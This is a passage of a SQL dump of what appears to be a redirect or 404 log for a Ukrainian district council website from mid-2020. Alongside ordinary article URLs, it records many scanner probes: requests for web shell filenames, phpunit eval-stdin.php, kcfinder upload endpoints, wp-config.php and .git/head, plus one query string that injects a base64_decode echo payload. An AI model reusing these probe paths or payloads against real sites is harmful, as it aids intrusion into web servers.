00:00:00',301),(35698,'https://malyn-rayrada.gov.ua/wp-includes/pomo/wp_time.php',NULL,'http://site.ru','',2,0,'2020-07-21 12:58:38','0000-00-00 00:00:00',301),(35699,'https://malyn-rayrada.gov.ua/wp-content/themes/twentyseventeen/content-post.php',NULL,'http://site.ru','',1,0,'2020-07-21 13:22:25','0000-00-00 00:00:00',301),(35700,'https://malyn-rayrada.gov.ua/wp-admin/user/user-profile.php',NULL,'http://site.ru','',2,0,'2020-07-21 14:17:32','0000-00-00 00:00:00',301),(35701,'https://malyn-rayrada.gov.ua/wp-content/plugins/background-image-cropper/new_license.php',NULL,'http://site.ru','',1,0,'2020-07-21 14:26:17','0000-00-00 00:00:00',301),(35702,'https://malyn-rayrada.gov.ua/wp-admin/user/mide.php',NULL,'http://site.ru','',1,0,'2020-07-21 14:36:47','0000-00-00 00:00:00',301),(35703,'https://malyn-rayrada.gov.ua/wp-includes/simplepie/cache/images.php',NULL,'http://site.ru','',2,0,'2020-07-21 15:30:25','0000-00-00 00:00:00',301),(35704,'https://malyn-rayrada.gov.ua/plugins/content/sdc/helper.php',NULL,'http://site.ru','',1,0,'2020-07-21 15:37:44','0000-00-00 00:00:00',301),(35705,'https://malyn-rayrada.gov.ua/wp-content/themes/404.php',NULL,'http://site.ru','',1,0,'2020-07-21 16:29:37','0000-00-00 00:00:00',301),(35706,'https://malyn-rayrada.gov.ua/index.php/1920-vidbulas-22-pozachergova-sesiya-malinskoji-rajonnoji-radi',NULL,'','',4,0,'2020-07-21 18:41:58','0000-00-00 00:00:00',301),(35707,'https://www.malyn-rayrada.gov.ua/index.php/1446-prokhannya-pro-dopomogu',NULL,'','',1,0,'2020-07-22 01:59:19','0000-00-00 00:00:00',301),(35708,'https://malyn-rayrada.gov.ua/wp-crons.php',NULL,'http://site.ru','',1,0,'2020-07-23 00:28:31','0000-00-00 00:00:00',301),(35709,'https://malyn-rayrada.gov.ua/updatecore/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-07-23 00:32:17','0000-00-00 00:00:00',301),(35710,'https://malyn-rayrada.gov.ua/sl.php',NULL,'http://site.ru','',2,0,'2020-07-23 05:28:18','0000-00-00 00:00:00',301),(35711,'https://malyn-rayrada.gov.ua/mixi.php',NULL,'http://site.ru','',1,0,'2020-07-23 17:37:54','0000-00-00 00:00:00',301),(35712,'https://malyn-rayrada.gov.ua/indexe.php',NULL,'http://site.ru','',2,0,'2020-07-23 17:51:14','0000-00-00 00:00:00',301),(35713,'https://malyn-rayrada.gov.ua/templates/beez3/o.php',NULL,'http://site.ru','',1,0,'2020-07-23 18:10:18','0000-00-00 00:00:00',301),(35714,'https://malyn-rayrada.gov.ua/anymore/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-07-23 18:35:21','0000-00-00 00:00:00',301),(35715,'https://malyn-rayrada.gov.ua/.index.php?xo=echo(base64_decode(\'ywr6b250awxvc2e=\'));',NULL,'','',1,0,'2020-07-23 21:12:54','0000-00-00 00:00:00',301),(35716,'https://malyn-rayrada.gov.ua/revision/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-07-23 22:30:45','0000-00-00 00:00:00',301),(35717,'https://malyn-rayrada.gov.ua/templates/atomic/info.php',NULL,'http://site.ru','',1,0,'2020-07-24 00:12:27','0000-00-00 00:00:00',301),(35718,'https://malyn-rayrada.gov.ua/components/com_contact/contact.lib.php',NULL,'http://site.ru','',2,0,'2020-07-24 00:36:28','0000-00-00 00:00:00',301),(35719,'https://malyn-rayrada.gov.ua/tmp/sfx.php',NULL,'http://site.ru','',1,0,'2020-07-24 00:58:02','0000-00-00 00:00:00',301),(35720,'https://malyn-rayrada.gov.ua/class-wp-defaults.php',NULL,'http://site.ru','',2,0,'2020-07-24 01:50:55','0000-00-00 00:00:00',301),(35721,'https://malyn-rayrada.gov.ua/settings_auto.php',NULL,'http://site.ru','',1,0,'2020-07-24 02:46:18','0000-00-00 00:00:00',301),(35722,'https://malyn-rayrada.gov.ua/components/s.php',NULL,'http://site.ru','',2,0,'2020-07-24 03:54:28','0000-00-00 00:00:00',301),(35723,'https://malyn-rayrada.gov.ua/df.php',NULL,'http://site.ru','',1,0,'2020-07-24 05:11:56','0000-00-00 00:00:00',301),(35724,'https://malyn-rayrada.gov.ua/dama.php',NULL,'http://site.ru','',1,0,'2020-07-24 05:39:52','0000-00-00 00:00:00',301),(35725,'https://malyn-rayrada.gov.ua/index.php/user-registration',NULL,'','',2,0,'2020-07-25 00:12:02','0000-00-00 00:00:00',301),(35726,'https://malyn-rayrada.gov.ua/index.php/joomla/users-component/registration-form',NULL,'','',2,0,'2020-07-25 00:12:03','0000-00-00 00:00:00',301),(35727,'https://malyn-rayrada.gov.ua/using-joomla/extensions/components/users-component/registration-form',NULL,'','',2,0,'2020-07-25 00:12:04','0000-00-00 00:00:00',301),(35728,'https://malyn-rayrada.gov.ua/freshrdp.com1.php',NULL,'http://site.ru','',3,0,'2020-07-25 03:03:12','0000-00-00 00:00:00',301),(35729,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/toor.php',NULL,'http://site.ru','',1,0,'2020-07-25 05:33:12','0000-00-00 00:00:00',301),(35730,'https://malyn-rayrada.gov.ua/backup/meuhy.php',NULL,'http://site.ru','',1,0,'2020-07-26 07:14:40','0000-00-00 00:00:00',301),(35731,'https://malyn-rayrada.gov.ua/tmp/404.php',NULL,'http://site.ru','',1,0,'2020-07-26 07:31:57','0000-00-00 00:00:00',301),(35732,'https://www.malyn-rayrada.gov.ua/index.php/1297-urochistosti-z-nagodi-25-richchya-pfu',NULL,'','',1,0,'2020-07-26 07:45:08','0000-00-00 00:00:00',301),(35733,'https://malyn-rayrada.gov.ua/generationmap.php',NULL,'http://site.ru','',1,0,'2020-07-26 07:50:16','0000-00-00 00:00:00',301),(35734,'https://malyn-rayrada.gov.ua/libraries/joomla/template/feal.php',NULL,'http://site.ru','',1,0,'2020-07-26 08:52:53','0000-00-00 00:00:00',301),(35735,'https://malyn-rayrada.gov.ua/components/com_contact/views/category/tmpl/fail_logs.php',NULL,'http://site.ru','',1,0,'2020-07-26 09:40:11','0000-00-00 00:00:00',301),(35736,'https://malyn-rayrada.gov.ua/verygs.php',NULL,'http://site.ru','',1,0,'2020-07-26 23:05:31','0000-00-00 00:00:00',301),(35737,'https://malyn-rayrada.gov.ua/miwed.php',NULL,'http://site.ru','',2,0,'2020-07-27 01:56:36','0000-00-00 00:00:00',301),(35738,'https://malyn-rayrada.gov.ua/wp-active.php',NULL,'http://site.ru','',2,0,'2020-07-27 02:23:09','0000-00-00 00:00:00',301),(35739,'https://malyn-rayrada.gov.ua/wp-logs.php',NULL,'http://site.ru','',2,0,'2020-07-27 04:29:58','0000-00-00 00:00:00',301),(35740,'https://malyn-rayrada.gov.ua/index.php/1381-t-g-shevchenko-vustami-ditej',NULL,'','',13,0,'2020-07-27 07:34:05','0000-00-00 00:00:00',301),(35741,'https://malyn-rayrada.gov.ua/index.php/wfnqdtdfza.php',NULL,'','',3,0,'2020-07-27 09:11:17','0000-00-00 00:00:00',301),(35742,'https://malyn-rayrada.gov.ua/gfedew.php',NULL,'http://site.ru','',1,0,'2020-07-27 10:33:41','0000-00-00 00:00:00',301),(35743,'https://malyn-rayrada.gov.ua/158.php',NULL,'http://site.ru','',1,0,'2020-07-27 10:42:25','0000-00-00 00:00:00',301),(35744,'https://malyn-rayrada.gov.ua/0.php',NULL,'http://site.ru','',1,0,'2020-07-27 11:38:52','0000-00-00 00:00:00',301),(35745,'https://malyn-rayrada.gov.ua/gg.php',NULL,'http://site.ru','',2,0,'2020-07-27 12:36:52','0000-00-00 00:00:00',301),(35746,'https://malyn-rayrada.gov.ua/index1.php',NULL,'http://site.ru','',1,0,'2020-07-27 15:03:45','0000-00-00 00:00:00',301),(35747,'https://malyn-rayrada.gov.ua/plugins/logo_img.php',NULL,'http://site.ru','',2,0,'2020-07-27 15:24:48','0000-00-00 00:00:00',301),(35748,'https://malyn-rayrada.gov.ua/wp-words.php',NULL,'http://site.ru','',1,0,'2020-07-27 16:11:36','0000-00-00 00:00:00',301),(35749,'https://malyn-rayrada.gov.ua/wp-linfo.php',NULL,'http://site.ru','',1,0,'2020-07-27 17:30:26','0000-00-00 00:00:00',301),(35750,'https://malyn-rayrada.gov.ua/check.php',NULL,'http://site.ru','',1,0,'2020-07-27 17:50:38','0000-00-00 00:00:00',301),(35751,'https://malyn-rayrada.gov.ua/categories.php',NULL,'http://site.ru','',2,0,'2020-07-27 19:34:17','0000-00-00 00:00:00',301),(35752,'https://malyn-rayrada.gov.ua/htqdhi.php',NULL,'http://site.ru','',2,0,'2020-07-28 04:03:29','0000-00-00 00:00:00',301),(35753,'https://malyn-rayrada.gov.ua/wp-imags.php',NULL,'http://site.ru','',1,0,'2020-07-28 04:25:46','0000-00-00 00:00:00',301),(35754,'https://malyn-rayrada.gov.ua/mod_ariimageslidersa.php',NULL,'http://site.ru','',3,0,'2020-07-28 04:49:55','0000-00-00 00:00:00',301),(35755,'https://malyn-rayrada.gov.ua/procate/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-07-28 05:42:55','0000-00-00 00:00:00',301),(35756,'https://malyn-rayrada.gov.ua/clienteempresarialesfera.online/includes.php',NULL,'http://site.ru','',2,0,'2020-07-28 05:54:31','0000-00-00 00:00:00',301),(35757,'https://malyn-rayrada.gov.ua/cli/system_infos.php',NULL,'http://site.ru','',1,0,'2020-07-28 06:10:12','0000-00-00 00:00:00',301),(35758,'https://malyn-rayrada.gov.ua/modules/mod_widgetkit_twitter/wp-update.php',NULL,'http://site.ru','',1,0,'2020-07-28 07:07:55','0000-00-00 00:00:00',301),(35759,'https://malyn-rayrada.gov.ua/wp-xml.php',NULL,'http://site.ru','',1,0,'2020-07-28 10:31:13','0000-00-00 00:00:00',301),(35760,'https://malyn-rayrada.gov.ua/kadvl.php',NULL,'http://site.ru','',2,0,'2020-07-28 10:40:18','0000-00-00 00:00:00',301),(35761,'https://malyn-rayrada.gov.ua/wp-dbs.php',NULL,'http://site.ru','',1,0,'2020-07-28 11:26:12','0000-00-00 00:00:00',301),(35762,'https://malyn-rayrada.gov.ua/templates/beez5/404.php',NULL,'http://site.ru','',1,0,'2020-07-28 12:18:04','0000-00-00 00:00:00',301),(35763,'https://malyn-rayrada.gov.ua/index.php/1945-ogoloshennya-pro-orendu-nerukhomogo-majna',NULL,'','',5,0,'2020-07-28 13:10:06','0000-00-00 00:00:00',301),(35764,'https://malyn-rayrada.gov.ua/top.php',NULL,'http://site.ru','',1,0,'2020-07-28 14:06:03','0000-00-00 00:00:00',301),(35765,'https://malyn-rayrada.gov.ua/components/com_foxcontact/uploads/ly.php',NULL,'http://site.ru','',1,0,'2020-07-28 15:02:43','0000-00-00 00:00:00',301),(35766,'https://malyn-rayrada.gov.ua/ajax-requests.new.php',NULL,'http://site.ru','',2,0,'2020-07-28 16:27:16','0000-00-00 00:00:00',301),(35767,'https://malyn-rayrada.gov.ua/index8632.php',NULL,'http://site.ru','',2,0,'2020-07-28 17:13:14','0000-00-00 00:00:00',301),(35768,'https://malyn-rayrada.gov.ua/55index.php',NULL,'http://site.ru','',1,0,'2020-07-29 04:51:14','0000-00-00 00:00:00',301),(35769,'https://malyn-rayrada.gov.ua/modules/sitemps.php',NULL,'http://site.ru','',1,0,'2020-07-29 05:20:16','0000-00-00 00:00:00',301),(35770,'https://malyn-rayrada.gov.ua/libraries/simplepie/wp-aespa.php',NULL,'http://site.ru','',1,0,'2020-07-29 07:10:51','0000-00-00 00:00:00',301),(35771,'https://malyn-rayrada.gov.ua/libraries/sitemps.php',NULL,'http://site.ru','',1,0,'2020-07-29 07:37:55','0000-00-00 00:00:00',301),(35772,'https://www.malyn-rayrada.gov.ua/index.php/1787-informatsiya-shchodo-vnesenikh-zmin-do-rajonnogo-byudzhetu-na-2017-rik',NULL,'','',3,0,'2020-07-29 14:41:50','0000-00-00 00:00:00',301),(35773,'https://malyn-rayrada.gov.ua/wp-config.php',NULL,'','',1,0,'2020-07-30 00:23:46','0000-00-00 00:00:00',301),(35774,'https://malyn-rayrada.gov.ua/templates/protostar/ups.php',NULL,'http://site.ru','',2,0,'2020-07-30 12:20:30','0000-00-00 00:00:00',301),(35775,'https://malyn-rayrada.gov.ua/index.php/1955-uvaga-botulizm-2?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2020-07-31 03:15:54','0000-00-00 00:00:00',301),(35776,'https://malyn-rayrada.gov.ua/img src=\'/',NULL,'http://malyn-rayrada.gov.ua/','',1,0,'2020-08-01 05:40:11','0000-00-00 00:00:00',301),(35777,'https://malyn-rayrada.gov.ua/img src=\'/old.kurs.com.ua/',NULL,'http://malyn-rayrada.gov.ua/','',1,0,'2020-08-01 05:40:12','0000-00-00 00:00:00',301),(35778,'https://malyn-rayrada.gov.ua/img src=\'/old.kurs.com.ua/static/images/',NULL,'http://malyn-rayrada.gov.ua/','',1,0,'2020-08-01 05:40:12','0000-00-00 00:00:00',301),(35779,'https://malyn-rayrada.gov.ua/img src=\'/old.kurs.com.ua/static/images/informer/',NULL,'http://malyn-rayrada.gov.ua/','',1,0,'2020-08-01 05:40:12','0000-00-00 00:00:00',301),(35780,'https://malyn-rayrada.gov.ua/index.php/component/',NULL,'http://malyn-rayrada.gov.ua/','',1,0,'2020-08-01 05:40:14','0000-00-00 00:00:00',301),(35781,'https://malyn-rayrada.gov.ua/img src=\'/old.kurs.com.ua/static/',NULL,'http://malyn-rayrada.gov.ua/','',1,0,'2020-08-01 05:40:39','0000-00-00 00:00:00',301),(35782,'https://malyn-rayrada.gov.ua/app/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2020-08-01 08:01:02','0000-00-00 00:00:00',301),(35783,'https://malyn-rayrada.gov.ua/core/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2020-08-01 08:01:04','0000-00-00 00:00:00',301),(35784,'https://malyn-rayrada.gov.ua/modules/gamification//vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-01 08:01:11','0000-00-00 00:00:00',301),(35785,'https://malyn-rayrada.gov.ua/modules/autoupgrade/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2020-08-01 08:01:17','0000-00-00 00:00:00',301),(35786,'https://malyn-rayrada.gov.ua/ckeditor/kcfinder/upload.php',NULL,'','',1,0,'2020-08-01 08:01:23','0000-00-00 00:00:00',301),(35787,'https://malyn-rayrada.gov.ua/painel/kcfinder/upload.php',NULL,'','',1,0,'2020-08-01 08:01:44','0000-00-00 00:00:00',301),(35788,'https://malyn-rayrada.gov.ua/panel/kcfinder/upload.php',NULL,'','',1,0,'2020-08-01 08:01:46','0000-00-00 00:00:00',301),(35789,'https://malyn-rayrada.gov.ua/yonetim/engine/ckeditor/kcfinder/upload.php',NULL,'','',1,0,'2020-08-01 08:01:48','0000-00-00 00:00:00',301),(35790,'https://malyn-rayrada.gov.ua/editdirect/ajax-upload.php?act=ajax',NULL,'','',1,0,'2020-08-01 08:02:00','0000-00-00 00:00:00',301),(35791,'https://malyn-rayrada.gov.ua/hader.php',NULL,'http://site.ru','',1,0,'2020-08-02 07:32:04','0000-00-00 00:00:00',301),(35792,'https://malyn-rayrada.gov.ua/templates/atomic/html.php',NULL,'http://site.ru','',1,0,'2020-08-02 07:34:35','0000-00-00 00:00:00',301),(35793,'https://malyn-rayrada.gov.ua/modules/mod_roknavmenu/themes/default/index.php',NULL,'http://site.ru','',3,0,'2020-08-02 07:37:29','0000-00-00 00:00:00',301),(35794,'https://malyn-rayrada.gov.ua/111index.php',NULL,'http://site.ru','',1,0,'2020-08-02 07:59:24','0000-00-00 00:00:00',301),(35795,'https://malyn-rayrada.gov.ua/images/stories/vulns.php',NULL,'http://site.ru','',3,0,'2020-08-02 08:22:30','0000-00-00 00:00:00',301),(35796,'https://malyn-rayrada.gov.ua/images/3xp.php',NULL,'http://site.ru','',1,0,'2020-08-02 08:27:06','0000-00-00 00:00:00',301),(35797,'https://malyn-rayrada.gov.ua/controller-tmp.php',NULL,'http://site.ru','',1,0,'2020-08-02 08:55:02','0000-00-00 00:00:00',301),(35798,'https://malyn-rayrada.gov.ua/ict.php',NULL,'http://site.ru','',2,0,'2020-08-02 08:56:29','0000-00-00 00:00:00',301),(35799,'https://malyn-rayrada.gov.ua/tmp/mod_config.php',NULL,'http://site.ru','',3,0,'2020-08-02 09:24:32','0000-00-00 00:00:00',301),(35800,'https://malyn-rayrada.gov.ua/wp-rss.php',NULL,'http://site.ru','',3,0,'2020-08-02 09:32:35','0000-00-00 00:00:00',301),(35801,'https://malyn-rayrada.gov.ua/tmp/tmp.php',NULL,'http://site.ru','',2,0,'2020-08-02 11:08:27','0000-00-00 00:00:00',301),(35802,'https://malyn-rayrada.gov.ua/cache/xnikx68min.php',NULL,'http://site.ru','',1,0,'2020-08-02 12:00:33','0000-00-00 00:00:00',301),(35803,'https://malyn-rayrada.gov.ua/includes/indeh.php',NULL,'http://site.ru','',1,0,'2020-08-02 13:51:11','0000-00-00 00:00:00',301),(35804,'https://malyn-rayrada.gov.ua/index.php/1944-podatkova-znizhka-dlya-fizichnikh-osib',NULL,'','',1,0,'2020-08-02 19:17:51','0000-00-00 00:00:00',301),(35805,'https://malyn-rayrada.gov.ua/php.php',NULL,'http://https://malyn-rayrada.gov.ua/','',6,0,'2020-08-03 20:30:27','0000-00-00 00:00:00',301),(35806,'https://www.malyn-rayrada.gov.ua/php.php',NULL,'http://https://www.malyn-rayrada.gov.ua/','',2,0,'2020-08-03 20:30:30','0000-00-00 00:00:00',301),(35807,'https://www.malyn-rayrada.gov.ua/phpinfo.php',NULL,'http://https://www.malyn-rayrada.gov.ua/','',2,0,'2020-08-03 20:30:30','0000-00-00 00:00:00',301),(35808,'https://www.malyn-rayrada.gov.ua/info.php',NULL,'http://https://www.malyn-rayrada.gov.ua/','',3,0,'2020-08-03 20:30:33','0000-00-00 00:00:00',301),(35809,'https://www.malyn-rayrada.gov.ua/_profiler/phpinfo',NULL,'http://https://www.malyn-rayrada.gov.ua/','',2,0,'2020-08-03 20:30:33','0000-00-00 00:00:00',301),(35810,'https://www.malyn-rayrada.gov.ua/infophp.php',NULL,'http://https://www.malyn-rayrada.gov.ua/','',2,0,'2020-08-03 20:30:34','0000-00-00 00:00:00',301),(35811,'https://malyn-rayrada.gov.ua/_profiler/phpinfo',NULL,'http://malyn-rayrada.gov.ua/_profiler/phpinfo','',5,0,'2020-08-03 20:30:36','0000-00-00 00:00:00',301),(35812,'https://malyn-rayrada.gov.ua/infophp.php',NULL,'http://malyn-rayrada.gov.ua/infophp.php','',5,0,'2020-08-03 20:30:36','0000-00-00 00:00:00',301),(35813,'https://malyn-rayrada.gov.ua/php_info.php',NULL,'http://malyn-rayrada.gov.ua/php_info.php','',5,0,'2020-08-03 20:30:36','0000-00-00 00:00:00',301),(35814,'https://www.malyn-rayrada.gov.ua/php_info.php',NULL,'http://https://www.malyn-rayrada.gov.ua/','',2,0,'2020-08-03 20:30:37','0000-00-00 00:00:00',301),(35815,'https://www.malyn-rayrada.gov.ua/test.php',NULL,'http://https://www.malyn-rayrada.gov.ua/','',2,0,'2020-08-03 20:30:37','0000-00-00 00:00:00',301),(35816,'https://www.malyn-rayrada.gov.ua/i.php',NULL,'http://https://www.malyn-rayrada.gov.ua/','',2,0,'2020-08-03 20:30:37','0000-00-00 00:00:00',301),(35817,'https://www.malyn-rayrada.gov.ua/asdf.php',NULL,'http://https://www.malyn-rayrada.gov.ua/','',2,0,'2020-08-03 20:30:37','0000-00-00 00:00:00',301),(35818,'https://www.malyn-rayrada.gov.ua/pinfo.php',NULL,'http://https://www.malyn-rayrada.gov.ua/','',2,0,'2020-08-03 20:30:37','0000-00-00 00:00:00',301),(35819,'https://www.malyn-rayrada.gov.ua/phpversion.php',NULL,'http://https://www.malyn-rayrada.gov.ua/','',2,0,'2020-08-03 20:30:39','0000-00-00 00:00:00',301),(35820,'https://www.malyn-rayrada.gov.ua/time.php',NULL,'http://https://www.malyn-rayrada.gov.ua/','',2,0,'2020-08-03 20:30:39','0000-00-00 00:00:00',301),(35821,'https://malyn-rayrada.gov.ua/i.php',NULL,'http://https://malyn-rayrada.gov.ua/','',5,0,'2020-08-03 20:30:44','0000-00-00 00:00:00',301),(35822,'https://malyn-rayrada.gov.ua/asdf.php',NULL,'http://https://malyn-rayrada.gov.ua/','',5,0,'2020-08-03 20:30:45','0000-00-00 00:00:00',301),(35823,'https://malyn-rayrada.gov.ua/pinfo.php',NULL,'http://https://malyn-rayrada.gov.ua/','',5,0,'2020-08-03 20:30:46','0000-00-00 00:00:00',301),(35824,'https://malyn-rayrada.gov.ua/phpversion.php',NULL,'http://https://malyn-rayrada.gov.ua/','',5,0,'2020-08-03 20:30:46','0000-00-00 00:00:00',301),(35825,'https://malyn-rayrada.gov.ua/time.php',NULL,'http://https://malyn-rayrada.gov.ua/','',5,0,'2020-08-03 20:30:46','0000-00-00 00:00:00',301),(35826,'https://www.malyn-rayrada.gov.ua/index.php/1646-do-vidoma-deputativ-mistsevikh-rad-silskikh-ta-selishchnikh-goliv',NULL,'','',1,0,'2020-08-04 13:25:24','0000-00-00 00:00:00',301),(35827,'https://www.malyn-rayrada.gov.ua/index.php/1360-20-lyutogo-den-gerojiv-nebesnoji-sotni-2',NULL,'','',2,0,'2020-08-06 01:16:20','0000-00-00 00:00:00',301),(35828,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2421-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji',NULL,'','',2,0,'2020-08-07 04:53:05','0000-00-00 00:00:00',301),(35829,'https://www.malyn-rayrada.gov.ua/index.php/1898-turnir-z-mini-futbolu-sered-shkolyariv',NULL,'','',2,0,'2020-08-07 09:59:00','0000-00-00 00:00:00',301),(35830,'https://malyn-rayrada.gov.ua/index.php/1955-uvaga-botulizm-2',NULL,'','',2,0,'2020-08-07 17:47:30','0000-00-00 00:00:00',301),(35831,'https://www.malyn-rayrada.gov.ua/index.php/1406-pro-dotrimannya-zakonu-ukrajini-pro-dostup-do-publichnoji-informatsiji-ta-reglamentu-roboti-rajonnoji-radi-vii-sklikannya',NULL,'','',1,0,'2020-08-08 22:16:05','0000-00-00 00:00:00',301),(35832,'https://www.malyn-rayrada.gov.ua/index.php/1642-veselogo-rizdva-2',NULL,'','',1,0,'2020-08-11 09:02:43','0000-00-00 00:00:00',301),(35833,'https://malyn-rayrada.gov.ua/install/',NULL,'','',1,0,'2020-08-11 16:53:52','0000-00-00 00:00:00',301),(35834,'https://malyn-rayrada.gov.ua/new-site/',NULL,'','',1,0,'2020-08-11 16:53:54','0000-00-00 00:00:00',301),(35835,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/zapobihannia-proiavam-koruptsii/2429-zakon-ukrajini-pro-zapobigannya-koruptsiji',NULL,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/zapobihannia-proiavam-koruptsii','',1,0,'2020-08-12 13:07:18','0000-00-00 00:00:00',301),(35836,'https://malyn-rayrada.gov.ua/index.php/1903-komunalne-pidpriemstvo-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',1,0,'2020-08-12 20:52:33','0000-00-00 00:00:00',301),(35837,'https://malyn-rayrada.gov.ua/index.php/zapobihannia-proiavam-koruptsii',NULL,'','',1,0,'2020-08-13 23:15:24','0000-00-00 00:00:00',301),(35838,'https://malyn-rayrada.gov.ua/index.php/1898-turnir-z-mini-futbolu-sered-shkolyariv',NULL,'','',3,0,'2020-08-14 14:15:44','0000-00-00 00:00:00',301),(35839,'https://www.malyn-rayrada.gov.ua/index.php/1963-dlya-tikh-komu-za',NULL,'','',1,0,'2020-08-14 20:57:00','0000-00-00 00:00:00',301),(35840,'https://malyn-rayrada.gov.ua//profile/register/',NULL,'','',3,0,'2020-08-16 07:57:11','0000-00-00 00:00:00',301),(35841,'https://malyn-rayrada.gov.ua/wp/profile/register/',NULL,'','',3,0,'2020-08-16 07:57:12','0000-00-00 00:00:00',301),(35842,'https://malyn-rayrada.gov.ua/wordpress/profile/register/',NULL,'','',3,0,'2020-08-16 07:57:12','0000-00-00 00:00:00',301),(35843,'https://malyn-rayrada.gov.ua/blog/profile/register/',NULL,'','',3,0,'2020-08-16 07:57:12','0000-00-00 00:00:00',301),(35844,'https://malyn-rayrada.gov.ua/new/profile/register/',NULL,'','',3,0,'2020-08-16 07:57:13','0000-00-00 00:00:00',301),(35845,'https://malyn-rayrada.gov.ua/old/profile/register/',NULL,'','',3,0,'2020-08-16 07:57:14','0000-00-00 00:00:00',301),(35846,'https://malyn-rayrada.gov.ua/demo/profile/register/',NULL,'','',3,0,'2020-08-16 07:57:14','0000-00-00 00:00:00',301),(35847,'https://www.malyn-rayrada.gov.ua/.git/head',NULL,'','',7,0,'2020-08-17 02:54:31','0000-00-00 00:00:00',301),(35848,'https://www.malyn-rayrada.gov.ua/index.php/1603-povidomlennya-pro-rezultati-mistsevikh-viboriv',NULL,'','',1,0,'2020-08-17 20:18:21','0000-00-00 00:00:00',301),(35849,'https://www.malyn-rayrada.gov.ua/index.php/1480-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue',NULL,'','',1,0,'2020-08-18 09:03:28','0000-00-00 00:00:00',301),(35850,'https://malyn-rayrada.gov.ua/attachments/article/2426/ðÿð’ðÿð“.pdf',NULL,'','',1,0,'2020-08-21 06:19:55','0000-00-00 00:00:00',301),(35851,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/k.php',NULL,'','',1,0,'2020-08-21 09:42:08','0000-00-00 00:00:00',301),(35852,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/s.php',NULL,'','',1,0,'2020-08-21 09:42:09','0000-00-00 00:00:00',301),(35853,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/login.php',NULL,'','',11,0,'2020-08-21 09:42:09','0000-00-00 00:00:00',301),(35854,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/logo.gif',NULL,'','',1,0,'2020-08-21 09:42:10','0000-00-00 00:00:00',301),(35855,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/favicon.png',NULL,'','',1,0,'2020-08-21 09:42:11','0000-00-00 00:00:00',301),(35856,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/theme/style.css',NULL,'','',2,0,'2020-08-21 09:42:14','0000-00-00 00:00:00',301),(35857,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/ufr.php',NULL,'','',1,0,'2020-08-21 09:42:18','0000-00-00 00:00:00',301),(35858,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/auth.php',NULL,'','',1,0,'2020-08-21 09:42:19','0000-00-00 00:00:00',301),(35859,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/functions.php',NULL,'','',1,0,'2020-08-21 09:42:20','0000-00-00 00:00:00',301),(35860,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/search.php',NULL,'','',1,0,'2020-08-21 09:42:20','0000-00-00 00:00:00',301),(35861,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin.php',NULL,'','',5,0,'2020-08-21 09:42:22','0000-00-00 00:00:00',301),(35862,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/config.php',NULL,'','',3,0,'2020-08-21 09:42:23','0000-00-00 00:00:00',301),(35863,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/pages/clientinfo.php',NULL,'','',1,0,'2020-08-21 09:42:27','0000-00-00 00:00:00',301),(35864,'https://www.malyn-rayrada.gov.ua/login.php',NULL,'','',2,0,'2020-08-21 09:42:35','0000-00-00 00:00:00',301),(35865,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/android/admin.php',NULL,'','',1,0,'2020-08-21 09:42:46','0000-00-00 00:00:00',301),(35866,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/template/img/img15.png',NULL,'','',1,0,'2020-08-21 09:42:52','0000-00-00 00:00:00',301),(35867,'https://www.malyn-rayrada.gov.ua/auth',NULL,'','',1,0,'2020-08-21 09:42:54','0000-00-00 00:00:00',301),(35868,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/gateway.php',NULL,'','',1,0,'2020-08-21 09:43:26','0000-00-00 00:00:00',301),(35869,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/connect_meta.php',NULL,'','',1,0,'2020-08-21 09:43:26','0000-00-00 00:00:00',301),(35870,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/index.html',NULL,'','',1,0,'2020-08-21 09:43:27','0000-00-00 00:00:00',301),(35871,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/graphics/banner.png',NULL,'','',1,0,'2020-08-21 09:43:28','0000-00-00 00:00:00',301),(35872,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/project.php',NULL,'','',1,0,'2020-08-21 09:43:37','0000-00-00 00:00:00',301),(35873,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/cron.php',NULL,'','',1,0,'2020-08-21 09:44:15','0000-00-00 00:00:00',301),(35874,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/logout.php',NULL,'','',1,0,'2020-08-21 09:44:16','0000-00-00 